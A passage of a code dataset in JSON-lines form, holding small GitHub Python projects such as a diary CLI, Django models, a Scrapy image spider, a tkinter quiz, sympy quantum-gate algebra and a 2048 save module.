break\n","repo_name":"milkey-mouse/illuminati-confirmed","sub_path":"loominarty/loominarty/peladophobian.py","file_name":"peladophobian.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12665821410","text":"from peewee import *\nimport datetime\nimport sys\nfrom collections import OrderedDict\n\n\n\n\n\ndb= SqliteDatabase(\"diary.db\")\n\n\nclass Entry(Model):\n #contenido\n #timestamp\n content = TextField()\n timestamp = DateTimeField(default=datetime.datetime.now)\n\n class Meta:\n database= db\n\ndef create_and_connect():\n \"\"\"Connect to the database\"\"\"\n db.connect()\n db.create_tables([Entry],safe=True)\n\ndef menu_loop():\n \"\"\" Show menu \"\"\"\n choice =None\n while choice != 'q':\n print(\"press 'q' to quit\")\n for key,value in menu.items():\n print(\"{}) {}\".format(key,value.__doc__))\n choice = input(\"Action: \").lower().strip()\n if choice in menu:\n menu[choice]()\n\n\ndef add_entry():\n \"\"\"Adds Entry\"\"\"\n print(\"Enter your thoughts. Press ctr + D to finish\")\n data = sys.stdin.read().strip()\n \n if data:\n if input(\"Do you want to save entry? 
[Y/N]\").lower().strip() != 'n':\n Entry.create(content=data)\n print(\"your entry was saved successfully \")\n\ndef view_entry(search_query=None):\n \"\"\"View all entries\"\"\"\n entries =Entry.select().order_by(Entry.timestamp.desc())\n\n if search_query:\n entries = entries.where(Entry.content.contains(search_query))\n\n for entry in entries:\n timestamp= entry.timestamp.strftime('%A %B %d, %Y %I:%M%p')\n print('\\n')\n print(timestamp)\n print('-'*len(timestamp))\n print(entry.content)\n print('\\n')\n print('-'*len(entry.content))\n print('n) next entry')\n print('e) edit entry')\n print('d) delete entry')\n print('q) return to menu')\n\n next_action= input(\"Action: \").lower().strip()\n if next_action == 'q':\n break\n elif next_action =='e':\n edit_entry()\n elif next_action == 'd':\n delete_entry(entry)\ndef edit_entry():\n \"\"\"Edit Entries\"\"\"\n entradas = sys.stdin.read().strip()\n Entry.content = entradas\n entradas.save()\ndef search_entries():\n \"\"\"Search Entries\"\"\"\n search_query= input(\"Search query: \").strip()\n view_entry(search_query)\n\ndef delete_entry(entry):\n \"\"\"Delete entries\"\"\"\n action= input(\"are you sure? [Y/N]: \").lower().strip()\n if action == 'y':\n entry.delete_instance()\n\n\nmenu= OrderedDict([\n ('a',add_entry),\n ('v',view_entry),\n ('s',search_entries),\n ('d',delete_entry)\n ])\n\n\nif __name__ == '__main__': # se usa para cuando pones from diary import solo importe las funciones\n create_and_connect()\n menu_loop()\n","repo_name":"ppinac/Practica_Python","sub_path":"Diary/diary.py","file_name":"diary.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7064819152","text":"from django.db import models\nfrom django.core.validators import MaxValueValidator,MinValueValidator\nfrom djmoney.models.fields import MoneyField\nfrom django.db.models.signals import pre_save\nfrom django.utils.text import slugify\n\nclass Book(models.Model):\n book_name=models.CharField(max_length=100)\n author_name=models.OneToOneField('Author', on_delete=models.CASCADE)\n option=(('p',\"published\"), ('u',\"unpublished\"))\n status=models.CharField(choices=option, default=\"p\", max_length=2)\n cost = MoneyField(max_digits=5, decimal_places=2, default_currency='INR')\n publish_date_time=models.DateTimeField(auto_now=False)\n\n def __str__(self):\n return str(self.book_name)\n \nclass Author(models.Model):\n author_name=models.CharField(max_length=100)\n author_rating=models.FloatField(validators=[MinValueValidator(0.0),\n MaxValueValidator(9.9)] )\n sub_genre=models.OneToOneField('Subgenre' ,on_delete=models.CASCADE)\n about=models.TextField(null=True, blank=True)\n\n def __str__(self):\n return str(self.author_name)\n\nclass Genre(models.Model):\n genre_name=models.CharField(max_length=80 , unique=False)\n genre_details=models.CharField(max_length=100)\n slug=models.SlugField(unique=False)\n\n class Meta:\n ordering=['genre_name']\n def __str__(self):\n return str(self.genre_name)\n\ndef pre_save_genre(sender, instance ,*args, **kwargs):\n slug=slugify(instance.genre_name)\n flag=Genre.objects.filter(slug=slug).exists()\n if flag:\n # slug=\"{}-{}\".format(slug,str(instance.id))\n slug=\"%s-%s\" %(slug,instance.id)\n else:\n instance.slug=slug\npre_save.connect(pre_save_genre,sender=Genre)\n\n\nclass Subgenre(models.Model):\n genre_name=models.OneToOneField('Genre',on_delete=models.CASCADE,unique=False)\n subgenre_name=models.CharField(max_length=100, 
null=True)\n description=models.TextField(null=True, blank=True)\n slug=models.SlugField(unique=False)\n\n def __str__(self):\n return str(self.subgenre_name)\n\n\ndef pre_save_subgenre(sender, instance ,*args, **kwargs):\n slug=slugify(instance.subgenre_name)\n flag=Subgenre.objects.filter(slug=slug).exists()\n if flag:\n # slug=\"{}-{}\".format(slug,str(instance.id))\n slug=\"%s-%s\" %(slug,instance.id)\n else:\n instance.slug=slug\npre_save.connect(pre_save_subgenre,sender=Subgenre)\n\n\n","repo_name":"Abhi868/Assignment","sub_path":"assign/MovieInfo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41067737181","text":"from turtle import Turtle, Screen\n\nMOVE_DISTANCE = 20\n\nclass EnemyPaddle(Turtle):\n def __init__(self):\n super().__init__()\n self.create_paddle()\n\n def create_paddle(self):\n self.shape(\"square\")\n self.color(\"white\")\n self.penup()\n self.goto(550, 0)\n self.resizemode(\"user\")\n self.shapesize(1, 4, 1)\n\n\n def match_ball(self, ball):\n if self.ycor() < ball.ycor():\n self.setheading(90)\n self.forward(20)\n elif self.ycor() > ball.ycor():\n self.setheading(270)\n self.forward(20)\n","repo_name":"MrBen89/Simple_python_exercises","sub_path":"simpleprojects/pong_enemy.py","file_name":"pong_enemy.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14404293095","text":"\n\ndef containsNearbyAlmostDuplicate(nums, k, t):\n s= set()\n for i in range(len(nums)):\n\n fil = filter(lambda x: x >= nums[i] - t, s)\n\n for f in fil:\n if f in s and f <= nums[i] + t:\n return True\n break\n\n s.add(nums[i])\n\n if len(s) == k + 1:\n s.remove(nums[i - k])\n\n return False\n\nif __name__ == '__main__':\n print(containsNearbyAlmostDuplicate([-3,3,-6],2,3))","repo_name":"LiuHan0723/MyLeetCodeExercise","sub_path":"containDuplicate220.py","file_name":"containDuplicate220.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10830711650","text":"from sympy import *\nfrom sympy_diamond import U, U00, U11, Up, Um, s00, s01, s10, s11, _sp, _sm, cp_state, hadamard_division, \\\n hadamard_product, SWAP, iSWAP, density_matrix, CNOT, H, U3, CZ, X, Y, Z\n\nx = Wild('x')\ny = Wild('y')\n\na00, a01, a10, a11, ap, am = symbols('a_00 a_01 a_10 a_11 a_p a_m', complex=True)\nb00, b01, b10, b11, bp, bm = symbols('b_00 b_01 b_10 b_11 b_p b_m', complex=True)\n# Basis coffs.\na = [a00, a11, ap, am]\nb = [b00, b11, bp, bm]\nbA = [b00, b01, b10, b11]\n# Time\nt = Symbol('t', real=True, positive=True)\na_abs_square_num = sum([Abs(a[n])**2 for n in range(4)])\nUt = U(t)\n\nA = Matrix.hstack(s00, s01, s10, s11)\nB = Matrix.hstack(s00, s11, _sp, _sm)\nC = Matrix.hstack(s00, _sp, _sm, s11)\nD = Matrix.hstack(s00, (s11 + _sp)/sqrt(2), (s11 - _sp)/sqrt(2), _sm)\nT_BA = A @ B.T # Coordinate transformation matrix from A to B basis\nT_AB = T_BA.T # B @ A.T also, but since they are unitary, this il the case\nT_CA = A @ C.T\nT_AC = T_CA.T\nassert T_BA @ T_AB == eye(4)\nassert T_CA @ T_AC == eye(4)\n\nprint('T_BA')\npprint(T_BA)\nprint('T_AB')\npprint(T_AB)\n\nT_I_BA = kronecker_product(eye(4), T_BA)\nT_I_AB = kronecker_product(eye(4), T_AB)\nT_BA_I = kronecker_product(T_BA, eye(4))\nT_AB_I = kronecker_product(T_AB, eye(4))\nT_AB_BA = kronecker_product(T_AB, T_BA)\nT_BA_AB = 
kronecker_product(T_BA, T_AB)\nT_AB_AB = kronecker_product(T_AB, T_AB)\nT_BA_BA = kronecker_product(T_BA, T_BA)\n\ndef basis_change(expr, init_basis: Matrix, final_basis: Matrix):\n T_IF = simplify(final_basis @ init_basis.T)\n T_FI = simplify(T_IF.T)\n eye_check = simplify(T_FI @ T_IF)\n assert eye_check == eye(init_basis.cols), f'Transformations not good!\\n {pprint(eye_check)}'\n return simplify(T_FI @ expr @ T_IF)\n\n# The U-gate is in the basis AA (as we have rewritten the C-qubits's basis vectors in terms\n# of the regular computationel basis (A basis), in the definition of the U-gate),\n# now we try to diagonalize it by writing it in the BB basis!\nAA = kronecker_product(A, A)\nBA = kronecker_product(B, A)\nAB = kronecker_product(A, B)\nBB = kronecker_product(B, B)\nCB = kronecker_product(C, B)\nCC = kronecker_product(C, C)\nDB = kronecker_product(D, B)\nU_BB = basis_change(Ut, AA, BB)\nU_CB = basis_change(Ut, AA, CB)\nU_AB = basis_change(Ut, AA, AB)\nU_CC = basis_change(Ut, AA, CC)\nU_DB = basis_change(Ut, AA, DB)\n\nprint('U (U_AA)')\npprint(Ut)\nprint(latex(Ut))\n\nprint('U_CC')\npprint(U_CC)\n\n# P, D = U(t).diagonalize()\n# pprint(P)\n# pprint(D)\n# U_BB = (T_I_BA @ U(t) @ T_I_AB).simplify()\nprint('U_BB')\npprint(U_BB) # Transform the basis of T to B. It's not so much a mess\nassert (U_BB @ U_BB.T.conjugate()).simplify() == eye(2**4) # Just to sanity check\n# Now we look at a collective state in the BxB-basis\nc = symbols('c_0000 c_0011 c_00p c_00m c_1100 c_1111 c_11p c_11m c_p00 c_p11 c_pp c_pm c_m00 c_m11 c_mp c_mm')\nstate_TC0 = Matrix([*[[_c] for _c in c]])\n# Apply the U_BB\nstate_TC = U_BB @ state_TC0\nprint('state_TC')\npprint(state_TC)\n\nprint('TC probabs')\ndm_TC = density_matrix(state_TC)\nfor i,_c in enumerate(c):\n pprint(_c)\n pprint(dm_TC[i,i].simplify())\n\nprint('iSWAP in A basis')\npprint(iSWAP(t))\nprint('iSWAP in B basis')\npprint((T_BA @ iSWAP(t) @ T_AB).simplify())\n\nprint('SWAP in A basis')\npprint(SWAP(t))\nprint('SWAP in B basis')\npprint((T_BA @ SWAP(t) @ T_AB).simplify())\n\nprint('CNOT in B basis')\npprint((T_BA @ CNOT @ T_AB).simplify())\n\n# pprint((T_AB_I @ U(t) @ T_BA_I).simplify()) # Transform the basis of C to A. It's a mess\n# pprint((T_AB_BA @ U(t) @ T_BA_AB).simplify()) # Transform the basis of C to A and T to B. 
It's a mess\n\nprint('Basis matrices in B-basis')\nUi_A = [U00(t), U11(t), Up(t), Um(t)]\nUi_B = [simplify(T_BA @ Ui @ T_AB) for Ui in Ui_A]\nprint('U00_B')\npprint(Ui_B[0])\nprint('U11_B')\npprint(Ui_B[1])\nprint('Up_B')\npprint(Ui_B[2])\nprint('Um_B')\npprint(Ui_B[3])\nexit()\n\nstateT_B = Matrix([\n [b[0]],\n [b[1]],\n [b[2]],\n [b[3]]\n])\n\nstateT_A = Matrix([\n [bA[0]],\n [bA[1]],\n [bA[2]],\n [bA[3]]\n])\n\n# The init dm of the T-state\nrho__T_B0 = stateT_B @ stateT_B.transpose().conjugate()\nrho__T_A0 = stateT_A @ stateT_A.transpose().conjugate()\nfor i in range(4):\n rho__T_B0[i, i] = rho__T_B0[i, i].replace(y * x * x.conjugate(), y * Abs(x) ** 2)\n rho__T_A0[i, i] = rho__T_A0[i, i].replace(y * x * x.conjugate(), y * Abs(x) ** 2)\n\n# The T-state after application of the U-gate\nrho__T_B = Matrix.zeros(4)\nrho__T_A = Matrix.zeros(4)\nfor i in range(4):\n rho__T_B += Abs(a[i]) ** 2 * Ui_B[i] @ rho__T_B0 @ Ui_B[i].replace(t, -t)\n rho__T_A += Abs(a[i]) ** 2 * Ui_A[i] @ rho__T_A0 @ Ui_A[i].replace(t, -t)\n\ndef simplify_rho_B(rho):\n for i in range(4):\n rho[i, i] = rho[i, i].collect(Abs(b[i])**2)\n rho[i, i] = rho[i, i].replace(a_abs_square_num, 1)\n for i in range(4):\n for j in range(4):\n rho[i, j] = rho[i, j].collect(b[i] * b[j].conjugate())\n return rho\n\ndef simplify_rho_A(rho):\n for i in range(4):\n rho[i, i] = rho[i, i].collect(Abs(bA[i])**2)\n rho[i, i] = rho[i, i].replace(a_abs_square_num, 1)\n for i in range(4):\n for j in range(4):\n rho[i, j] = rho[i, j].collect(bA[i] * bA[j].conjugate())\n return rho\n\nrho__T_B = MutableMatrix(rho__T_B)\nrho__T_B = simplify_rho_B(rho__T_B)\n\nrho__T_A = MutableMatrix(rho__T_A)\nrho__T_A = simplify_rho_A(rho__T_A)\n\nprint('rho__T_B')\npprint(rho__T_B)\n# print('rho__T_A')\n# pprint(rho__T_A)\n\na00_, a11_, ap_, am_ = Abs(a[0])**2, Abs(a[1])**2, Abs(a[2])**2, Abs(a[3])**2\na01_, a10_ = Abs(a01)**2, Abs(a10)**2\n\nprint('rho__T_A from rho__T_B')\n# rho__T_A_fromB = T_AB * rho__T_B * T_BA\nrho__T_A_fromB = T_AB @ rho__T_B @ T_BA\nrho__T_A_fromB = rho__T_A_fromB.replace(bp, (b01 + b10)/sqrt(2)).replace(bm, (b01 - b10)/sqrt(2)).expand()\nfor i in range(4):\n for j in range(4):\n entry_AfromB = rho__T_A_fromB[i, j]\n entry_AfromB = entry_AfromB.replace(Abs(x + y)**2, Abs(x)**2 + Abs(y)**2 + x*y.conjugate() + y*x.conjugate())\n for sign in [1, -1]:\n for _a in a:\n entry_AfromB = entry_AfromB.subs(b01 * exp(sign*I*t) * conjugate(b01) * Abs(_a)**2 / 4,\n Abs(b01)**2 * exp(sign*I*t) * Abs(_a)**2 / 4)\n entry_AfromB = entry_AfromB.subs(b10 * exp(sign*I*t) * conjugate(b10) * Abs(_a)**2 / 4,\n Abs(b10)**2 * exp(sign*I*t) * Abs(_a)**2 / 4)\n for _a in a:\n entry_AfromB = entry_AfromB.subs(b01 * conjugate(b01) * Abs(_a)**2 / 2,\n Abs(b01)**2 * Abs(_a)**2 / 2)\n entry_AfromB = entry_AfromB.subs(b10 * conjugate(b10) * Abs(_a)**2 / 2,\n Abs(b10)**2 * Abs(_a)**2 / 2)\n entry_A = rho__T_A[i, j].expand()\n diff = entry_AfromB - entry_A\n equal = diff == 0\n if not equal:\n print(i,j)\n print('diff')\n diff = diff.collect(a00_)\n diff = diff.subs(a00_, 1 - a11_ - ap_ - am_).expand()\n diff = diff.expand()\n diff = diff.collect(exp(I*t))\n pprint(diff)\n assert diff == 0\n # exit()\n\nexit()\n\n# print('rho__T_A')\n# pprint(rho__T_A) # This is very cluttered\n\nprint('rho__T_B0')\npprint(rho__T_B0)\n\nprint('rho__T_B / rho__T_B0')\nrho__T_B_div_rho__T_B0 = hadamard_division(rho__T_B, rho__T_B0)\npprint(rho__T_B_div_rho__T_B0)\ndef rewrite_rho__T_B(rho):\n rho[0,1] = rho[0,1].replace(am_, 1 - a00_ - a11_ - 
ap_).collect(a00_).collect(a11_).collect(ap_).collect(exp(I*t) - 1)\n rho[1,0] = rho[1,0].replace(am_, 1 - a00_ - a11_ - ap_).collect(a00_).collect(a11_).collect(ap_).collect(exp(-I*t) - 1)\n\n rho[0,2] = rho[0,2].replace(a11_, 1 - a00_ - ap_ - am_).collect(a00_).collect(ap_).collect(exp(I*t) - 1)\n rho[2,0] = rho[2,0].replace(a11_, 1 - a00_ - ap_ - am_).collect(a00_).collect(ap_).collect(exp(-I*t) - 1)\n\n rho[0,3] = rho[0,3].replace(a00_, 1 - a11_ - ap_ - am_).collect(a11_).collect(ap_).collect(exp(I*t) - 1)\n rho[3,0] = rho[3,0].replace(a00_, 1 - a11_ - ap_ - am_).collect(a11_).collect(ap_).collect(exp(-I*t) - 1)\n\n rho[1,2] = rho[1,2].replace(a00_, 1 - a11_ - ap_ - am_).collect(a11_).collect(ap_).collect(exp(-I*t) - 1)\n rho[2,1] = rho[2,1].replace(a00_, 1 - a11_ - ap_ - am_).collect(a11_).collect(ap_).collect(exp(I*t) - 1)\n\n rho[1,3] = rho[1,3].replace(a11_, 1 - a00_ - ap_ - am_).collect(a00_).collect(ap_).collect(exp(-I*t) - 1)\n rho[3,1] = rho[3,1].replace(a11_, 1 - a00_ - ap_ - am_).collect(a00_).collect(ap_).collect(exp(I*t) - 1)\n\n rho[2,3] = rho[2,3].replace(ap_, 1 - a00_ - a11_ - am_).collect(a00_).collect(a11_).collect(exp(-I*t) - 1)\n rho[3,2] = rho[3,2].replace(ap_, 1 - a00_ - a11_ - am_).collect(a00_).collect(a11_).collect(exp(-I*t) - 1)\n # rho[0,2] = rho[0,2].replace(x*y - y, )\n return rho\nrho__T_B_div_rho__T_B0 = rewrite_rho__T_B(rho__T_B_div_rho__T_B0)\nprint('... simplified')\npprint(rho__T_B_div_rho__T_B0)\npprint(rho__T_B_div_rho__T_B0.free_symbols)\n\nprint('rho__T_B / rho__T_B0 - Matrix.ones(4)')\npprint(rho__T_B_div_rho__T_B0 - Matrix.ones(4))\n\nz_t = Symbol('z(t)') # z(t)\npprint(z_t)\nexit()\n\nprint('rho__T_B / rho__T_B0 for a00 = 1')\npprint(rho__T_B_div_rho__T_B0.replace(a[0], 1).replace(a[1], 0).replace(a[2], 0).replace(a[3], 0))\nprint('rho__T_B / rho__T_B0 for a11 = 1')\npprint(rho__T_B_div_rho__T_B0.replace(a[0], 0).replace(a[1], 1).replace(a[2], 0).replace(a[3], 0))\nprint('rho__T_B / rho__T_B0 for ap = 1')\npprint(rho__T_B_div_rho__T_B0.replace(a[0], 0).replace(a[1], 0).replace(a[2], 1).replace(a[3], 0))\nprint('rho__T_B / rho__T_B0 for am = 1')\npprint(rho__T_B_div_rho__T_B0.replace(a[0], 0).replace(a[1], 0).replace(a[2], 0).replace(a[3], 1))\n\na_U_sum = Matrix.zeros(4)\nfor i in range(4):\n a_U_sum += a[i] * Ui_B[i]\npprint(a_U_sum @ a_U_sum.transpose().conjugate())\n\n##### STOP #####\nexit()\n\nstate_T, vs, phis = cp_state(2, ['v', 'phi'])\npprint(state_T @ state_T.T)\n\nU_T_t = a[0]*U00(t) + a[1]*U11(t) + a[2]*Up(t) + a[3]*Um(t)\n\nprint('U_T_t')\npprint(U_T_t)\n\nUt = U(t)\nstateC = Matrix([\n [a[0]],\n [(a[2] + a[3])/sqrt(2)],\n [(a[2] - a[3])/sqrt(2)],\n [a[1]]\n])\n\nstate = kronecker_product(stateC, stateT_B)\n\nprint('Ut @ state')\npprint(Ut @ state)\n\nprint('kron eye x U_T_t')\nU_CT_t = kronecker_product(eye(2**2), U_T_t)\npprint((U_CT_t @ state).simplify())\n","repo_name":"EmilBahnsen/masters-source","sub_path":"sympy_diamond/U_function_of_C_and_t.py","file_name":"U_function_of_C_and_t.py","file_ext":"py","file_size_in_byte":10319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74082828118","text":"from vilipix.items import VilipixItem\nimport scrapy\nfrom scrapy import Spider, Request\nfrom datetime import datetime, date, timedelta\nfrom urllib.parse import urlencode\nimport json\n\nIMAGES = 25 # 手动指定一天的图片数\n\nclass PixivSpider(scrapy.Spider):\n name = 'pixiv'\n allowed_domains = ['vilipix.com']\n start_urls = ['http://vilipix.com/']\n\n def start_requests(self):\n # 
为确保可以加载图片,选取昨天的网址\n yesterday = (date.today() + timedelta(days = -1)).strftime(\"%Y%m%d\")\n base_params = {'mode':'daily','date':yesterday,'limit':IMAGES,'offset':0}\n base_url = 'https://www.vilipix.com/api/illust?'\n params = urlencode(base_params)\n url = base_url+params\n yield Request(url,self.parse)\n\n def parse(self, response):\n result = json.loads(response.text)\n for image in result.get('rows'):\n item = VilipixItem()\n item['id'] = image.get('id')\n item['url'] = image.get('regular_url')\n item['title'] = image.get('title')\n print(\"id:{}\\t url:{}\\t title:{}\".format(item['id'],item['url'],item['title']))\n yield item\n","repo_name":"Ther-nullptr/vilipix","sub_path":"spiders/pixiv.py","file_name":"pixiv.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"3635876082","text":"from tkinter import *\nfrom quiz_brain import QuizBrain\n\nTHEME_COLOR = \"#375362\"\n\n\nclass QuizInterface:\n def __init__(self, quiz_brain: QuizBrain):\n self.quiz = quiz_brain\n self.window = Tk()\n self.window.title(\"tjh's Quiz\")\n self.window.config(bg=THEME_COLOR, pady=20, padx=20)\n\n self.canvas = Canvas(width=300, height=250, bg=\"white\", highlightthickness=0)\n self.question_text = self.canvas.create_text(150, 125, text=\"\", fill=THEME_COLOR, width=280,\n font=(\"Arial\", 20, \"italic\"))\n self.canvas.grid(row=1, column=0, columnspan=2, pady=40)\n\n self.score_counter = Label()\n self.score_counter.config(text=\"Score: 0\", bg=THEME_COLOR, fg=\"white\", font=(\"Arial\", 16))\n self.score_counter.grid(row=0, column=1)\n\n tick_img = PhotoImage(file=\"./images/true.png\")\n self.tick_button = Button(image=tick_img, highlightthickness=0, command=self.check_answer_true)\n self.tick_button.grid(row=2, column=0)\n\n cross_img = PhotoImage(file=\"./images/false.png\")\n self.cross_button = Button(image=cross_img, highlightthickness=0, command=self.check_answer_false)\n self.cross_button.grid(row=2, column=1)\n\n self.get_next_question()\n\n self.window.mainloop()\n\n\n def get_next_question(self):\n self.canvas.config(bg=\"white\")\n self.score_counter.config(text=f\"Score: {self.quiz.score}\")\n if self.quiz.still_has_questions():\n q_text = self.quiz.next_question()\n self.canvas.itemconfig(self.question_text, text=q_text)\n else:\n self.canvas.itemconfig(self.question_text, text=f\"Quiz Complete \\n Final score: {self.quiz.score}/10\")\n self.tick_button.config(state=\"disabled\")\n self.cross_button.config(state=\"disabled\")\n\n def check_answer_true(self):\n result = self.quiz.check_answer(\"True\")\n self.give_feedback(result)\n\n def check_answer_false(self):\n result = self.quiz.check_answer(\"False\")\n self.give_feedback(result)\n\n def give_feedback(self, result):\n if result:\n self.canvas.config(bg=\"green\")\n else:\n self.canvas.config(bg=\"red\")\n self.window.after(1000, self.get_next_question)\n\n\n","repo_name":"TylerHardwick/100-days-of-Python","sub_path":"Day-34-GUI-API-Quiz/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"515330900","text":"import pytest\n\nfrom components.fsm.states import VesselState, BerthState\nfrom components.fsm import VesselStateMachine, BerthStateMachine\n\nfrom .constants import SECONDS_IN_DAY\nfrom .fixtures import world_and_timer_processor_fixture\n\n\n@pytest.fixture()\ndef vessel_fsm():\n return 
VesselStateMachine()\n\n\n@pytest.fixture()\ndef berth_fsm():\n return BerthStateMachine(lambda _: 100)\n\n\ndef test_flow(vessel_fsm, berth_fsm, world_and_timer_processor_fixture):\n # Unpack the world and timer processor\n world, timer_processor = world_and_timer_processor_fixture\n\n # A vessel appears as a scheduled vessel\n assert vessel_fsm.current() == VesselState.SCHEDULED\n vessel_fsm.generate()\n\n assert vessel_fsm.current() == VesselState.INCOMING\n\n vessel_fsm.assign_berth(berth_fsm, 1)\n\n # A vessel is then routed to a berth, this should result in the berth\n # being booked and in the vessel heading to the berth\n vessel_fsm.go_to_berth()\n\n assert vessel_fsm.current() == VesselState.GOING_TO_BERTH\n assert berth_fsm.current() == BerthState.WAITING_FOR_VESSEL\n\n # The vessel arrives at the berth and it is processed\n vessel_fsm.servicing(None)\n\n assert vessel_fsm.current() == VesselState.SERVICING\n assert berth_fsm.current() == BerthState.SERVING_VESSEL\n\n # Wait to make sure the timer fired\n timer_processor._process(SECONDS_IN_DAY)\n\n # The vessel should have finished processing and the berth\n # should be free\n print(vessel_fsm.current())\n assert vessel_fsm.current() == VesselState.WAITING_FOR_DEPARTURE_CLEARANCE\n assert berth_fsm.current() == BerthState.AVAILABLE\n\n # Make the vessel leave and complete the visit\n vessel_fsm.leave()\n assert vessel_fsm.current() == VesselState.LEAVING\n\n vessel_fsm.complete()\n assert vessel_fsm.current() == VesselState.LEFT\n","repo_name":"pyseidon-sim/pyseidon","sub_path":"tests/test_ship_state_machine.py","file_name":"test_ship_state_machine.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"85"} +{"seq_id":"20953950892","text":"#!/usr/bin/env python \n# encoding: utf-8 \n\n\"\"\" \n@author: @樊厚翔\n@contact: houxiang_fan@163.com \n@file: utils.py \n@time: 2019/7/4 19:48 \n\"\"\"\n\nimport numpy as np\n\ndef im2col(input_data,f_height,f_width,stride = 1,padding = 0):\n \"\"\"优化卷积算法 将原来矩阵展开\"\"\"\n out_channel,in_channel,height,width = input_data.shape\n\n out_height = 1 + (height + 2 * padding - f_height) // stride\n out_width = 1 + (width + 2 * padding - f_width) // stride\n\n img = np.pad(input_data,[(0,0),(0,0),(padding,padding),(padding,padding)],'constant')\n col = np.zeros((out_channel,in_channel,f_height,f_width,out_height,out_width))\n\n for y in range(f_height):\n y_max = y + stride * out_height\n for x in range(f_width):\n x_max = x + stride * out_width\n col[:, :, y, x, :, :] = img[:, :, y:y_max:stride, x:x_max:stride]\n\n # 坐标轴的变换\n col = col.transpose(0, 4, 5, 1, 2, 3).reshape(out_channel * out_height * out_width, -1)\n\n return col\n\ndef col2im(col,input_shape,f_height,f_width,stride = 1,padding = 0):\n \"\"\"将展开的矩阵还原\"\"\"\n\n N,C,height,width = input_shape\n\n out_height = (height + 2 * padding - f_height) // stride + 1\n out_width = (width + 2 * padding - f_width) // stride + 1\n col = col.reshape(N, out_height, out_width, C, f_height, f_width).transpose(0, 3, 4, 5, 1, 2)\n\n img = np.zeros((N, C, height + 2*padding + stride - 1, width + 2*padding + stride - 1))\n for y in range(f_height):\n y_max = y + stride*out_height\n for x in range(f_width):\n x_max = x + stride*out_width\n img[:, :, y:y_max:stride, x:x_max:stride] += col[:, :, y, x, :, :]\n\n return img[:, :, padding:height + padding, padding:width + padding]\n\ndef translate(y):\n train_y = np.zeros([y.shape[0], 10])\n for i in range(y.shape[0]):\n for j in 
range(10):\n if y[i] == j:\n train_y[i][j] = 1\n return train_y\n","repo_name":"masamibf/numpy-for-CNN","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"42262882739","text":"\"\"\"\nRohan Dalal\n27 January 2021\nIDT\n1st Period\nSMF_8\n\"\"\"\nimport cs50\nimport os,sys\nimport random\n\ndef main():\n print('This is a custom dice roller, coinflipper, it can even give you a random card')\n Choice= input('Would you like to flip a coin, roll dice, or get a random card?')\n if(Choice==' Flip a coin'):\n sides =['heads', 'tails']\n x=random.randint(0,1)\n print('You got ' +sides[x])\n elif(Choice==' roll dice'):\n y= input('Would you Like to roll one or two dice')\n z= int(input('How many sides would you like your dice to have'))\n if(y==' one'):\n x=random.randint(1,z)\n print('You rolled a '+str(x))\n elif(y==' two'):\n a=random.randint(1,z)\n b=random.randint(1,z)\n print('You rolled a '+str(a)+' and a '+str(b))\n elif(Choice==' Get a random card'):\n cards=['Ace', '2', '3', '4', '5','6', '7', '8', '9', '10','Jack', 'Queen', 'King']\n suits=[\"Spades\", \"Diamonds\", \"Clubs\", \"Hearts\"]\n a=cards[random.randint(0,12)]\n b=suits[random.randint(0,3)]\n print('You drew a(n) '+a+' of '+b)\nif(__name__=='__main__'):\n main()\n\n\n","repo_name":"RohanKD/IDT-SMF-2021","sub_path":"SMF_8.py","file_name":"SMF_8.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18446104244","text":"# Fonctionnalité de sauvegarde de la grille en cours\n\nimport os\nfrom grid_2048 import init_grid\nos.getcwd()\n\nif __name__ == \"__main__\":\n os .mkdir(\"Saves\")\nos.chdir(\"Saves\")\n\ndef file_exists(n): # Vérifie si le fichier de sauvegarde numéro n existe\n try:\n f = open(\"save\" + str(n) + \".txt\", 'r')\n return True\n except:\n return False\n\ndef premier_fichier_non_existant():\n i = 1\n while file_exists(i):\n i += 1\n return i\n# Cette dernière fonction permet au système de sauvegarde de savoir sur quel fichier sauvegarder la partie en cours\n# i.e. 
si les fichiers 1, 2, 3, ..., 10 sont déjà pris, cela sera sauvegardé sur le 11è\n\n\ndef sauvegarde(grid, theme, nombre): # Sauvegarde la grille grid dans fichier de sauvegarde n° nombre \n try:\n f = open('save' + str(nombre) + '.txt', 'x')\n n = len(grid)\n f.write(theme + '\\n') # On stocke le thème pour un futur affichage\n for i in range(n):\n for j in range(n):\n f.write(str(grid[i][j]) + \",\")\n f.write(\"\\n\")\n f.close()\n except:\n print(\"Une sauvegarde existe déjà à la place du fichier \" + str(nombre))\n\n\ndef ecraser_sauvegarde(string):\n os.remove(string)\n\n\ndef recuperation(string):\n f = open(string, 'r')\n file = f.read().split(\"\\n\")\n f.close()\n n = len(file) - 2 # Taille de la grille, qui est carrée (-2 car la première ligne contient le thème, et la dernière contient '')\n grid = [[0 for i in range(n)] for i in range(n)]\n for i in range(1, n+1):\n valeurs = file[i].split(',')\n valeurs.pop(-1) # Le dernier élément de valeurs est '', on n'en veut pas\n for j in range(n):\n grid[i-1][j] = int(valeurs[j])\n return grid, 